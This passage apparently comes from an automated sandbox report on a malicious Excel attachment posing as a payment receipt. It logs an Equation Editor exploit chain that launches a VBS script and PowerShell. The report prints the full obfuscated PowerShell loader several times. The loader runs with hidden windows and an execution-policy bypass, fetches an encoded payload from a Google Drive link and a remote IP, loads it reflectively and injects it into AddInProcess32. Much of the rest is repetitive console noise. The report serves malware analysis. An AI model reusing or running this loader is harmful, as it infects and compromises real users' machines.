FzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: Comprobante de pago.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2186
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2186Jump to behavior
    Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
    Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 3932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/10@4/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Comprobante de pago.xlam.xlsxJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8FA1.tmpJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................F.a.l.s.e.P.............................H..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................l.s.(.P.............................M..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.n. .z.e.r.o..................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................+..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................P.a.r.a.m.e.t.e.r. .n.a.m.e.:. .l.e.n.g.t.h."......................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................L..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.4....._..........................s............x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................k..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................r.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................0..........................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................>..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.9.0.....Q..........................s............x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................]..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................q..........................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................~..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................`.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................g..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................z..........................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.7.6.7................................s............x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................(..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;..........................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................H..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[..........................s....................j.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................i..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................|..........................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................U.n.a.b.l.e. .t.o. .f.i.n.d. .t.y.p.e. .[.d.n.l.i.b...I.O...H.o.m.e.]...........x.*.....H.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.4.8.............................m.e.]...........x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................$.......................m.e.]...........................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................1.......................m.e.]...........x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................D.......................m.e.]...........................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................R.......................m.e.]...........x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .u.n.t.i.m.e.E.x.c.e.p.t.i.o.n.....e.......................m.e.]...........x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................q.......................m.e.]...........x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...................T.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................................................m.e.]...........x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................m.e.]...........x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1................................s............x.*.....$.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................. ..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................3..........................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................@..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................T..........................s............................x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................a..........................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................u..........................s....................`.......x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............x.*.............x...............Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Comprobante de pago.xlam.xlsxReversingLabs: Detection: 68%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
